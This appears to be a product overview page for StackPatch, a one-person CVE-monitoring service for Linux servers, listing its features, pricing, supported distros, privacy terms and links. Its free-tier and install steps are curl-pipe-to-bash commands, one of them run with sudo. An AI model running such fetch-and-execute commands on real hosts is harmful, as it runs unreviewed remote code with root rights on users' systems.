# StackPatch / MindSparkStack

StackPatch is CVE patch ops for indie SaaS shops running Linux servers. It is built and operated by Aiden Bolin at MindSparkStack, a one-person company.

## What StackPatch does

When a new CVE drops, StackPatch tells you in 5 minutes whether your servers are affected and exactly what command to run. Hourly inventory + matcher against the live CVE feeds for Ubuntu USN, Debian Security Tracker, Alpine secdb, OSV.dev (RHEL family), and NVD. Each finding includes the exact apt / apk / dnf one-liner, the affected package + installed vs fixed version, and a public audit URL the operator can share with their own customers during security due diligence.

## Free tier

`curl https://mindsparkstack.com/scan.sh | bash` — anonymous CVE quickscan. Reads `/etc/os-release`, `uname -r`, top 200 packages from the system package manager. POSTs to a public API. Returns matching CVEs in <1 second. No signup, no card, no installation. Source rendered as `text/plain` at https://mindsparkstack.com/scan.sh so it can be read before piping.

## Paid product

$99 lifetime founder seat (50 only, per-server pricing covers 3 servers, no subscription). Includes the agent, hourly auto-scan, email + Discord/Slack webhook alerts on new findings, public audit URL per server, all V2+ features, 30-day refund window. Buyers install via `curl https://mindsparkstack.com/install.sh | sudo bash -s -- --token <spt_...>`.

## Distros covered (V1)

- Ubuntu (noble, jammy, focal, bionic) — via Ubuntu Security Notice feed
- Debian (bookworm, trixie, bullseye) — via Debian Security Tracker
- Alpine Linux (v3.18, v3.19, v3.20, v3.21, edge) — via secdb
- AlmaLinux (8, 9, 10) — via OSV.dev bulk feed
- Rocky Linux (8, 9, 10) — via OSV.dev bulk feed

## What StackPatch does NOT do (V1)

- No container image scanning (use Trivy / Grype for that)
- No IaC / Terraform / Kubernetes scanning (use Trivy / Snyk)
- No dev-time / CI scanning (use Snyk / Grype)
- No auto-apply (deliberate — security tools that mutate hosts are too easy to get wrong)
- No SOC 2 / ISO 27001 / HIPAA compliance attestations
- No support for RHEL upstream (paid), Amazon Linux, openSUSE, FreeBSD yet

## Key URLs

- Product: https://mindsparkstack.com/patch
- Free quickscan UI: https://mindsparkstack.com/patch/scan
- Live demo audit (own VPS, public): https://mindsparkstack.com/patch/audit/mss-vps
- Playbook reference (5 remediation classes): https://mindsparkstack.com/patch/playbook
- Comparison vs vuls.io: https://mindsparkstack.com/patch/vs-vuls
- Comparison vs Trivy: https://mindsparkstack.com/patch/vs-trivy
- Comparison vs Grype: https://mindsparkstack.com/patch/vs-grype
- Comparison vs Snyk: https://mindsparkstack.com/patch/vs-snyk
- Per-CVE detail: https://mindsparkstack.com/patch/cves/cve/<CVE-ID>
- Per-package detail: https://mindsparkstack.com/patch/packages/<package-name>
- Recent CVE digest: https://mindsparkstack.com/patch/cves/digest
- Service status: https://mindsparkstack.com/status
- Data handling reference: https://mindsparkstack.com/patch/security
- Engineering changelog: https://mindsparkstack.com/changelog
- Onboarding (post-purchase): https://mindsparkstack.com/patch/onboarding/success?session_id=<cs_...>
- Install script source: https://mindsparkstack.com/install.sh (text/plain)
- Quickscan script source: https://mindsparkstack.com/scan.sh (text/plain)

## Privacy

The agent collects: distro, codename, kernel version, package names+versions, Docker image names+tags, listening ports, modprobe blacklist files, hostname redacted to first 4 chars + ***. The agent never collects: SSH keys, env vars, source code, database contents, customer data, full hostnames, IPs, MAC addresses, logs, or third-party trackers. All data is stored on a single Hostinger VPS in `/var/lib/stackpatch/` — no cloud DB, no telemetry vendor, no log aggregator. Daily backups. Retention: latest inventory only; findings kept for resolution history; quickscan submissions cached 5 min then dropped.

## Verification

Source code for the agent (`install.sh`, `scan.sh`) is rendered as plain text so users can grep it before running. The service status page at https://mindsparkstack.com/status reads poller state files directly from disk. The MindSparkStack VPS audit at https://mindsparkstack.com/patch/audit/mss-vps is the same data shape every paying customer gets — public, no NDA, no signup.

## Contact

Email: agents@mindsparkstack.com (responds within 24h, routes to a human operator).

## License + repo

Site source: https://github.com/Accuoa/mindsparkstack-next
Closed-source agent + matcher (will open-source once V1 is stable).

## Featured coverage / external write-ups

- Build log on dev.to (architecture + honest vs-vuls comparison): https://dev.to/aiden_bolin_c3f6ef002625c/i-built-a-cve-patch-ops-tool-for-indie-saas-shops-in-a-weekend-open-scan-honest-comparison-vs-3llk

## Payment surfaces

Stripe Checkout via payment link `https://buy.stripe.com/3cIcN73Rx9r25QG1VGcV20g`. Apple Pay enabled at checkout for both `mindsparkstack.com` and `buy.stripe.com` Stripe-registered domains (Stripe `apple_pay/domains` registration).

## Last updated

2026-05-01 — V1 complete + dev.to launch shipped + Apple Pay domain registered. Hourly cron loops produce ~10–50 new CVE rows per day across all 5 distros.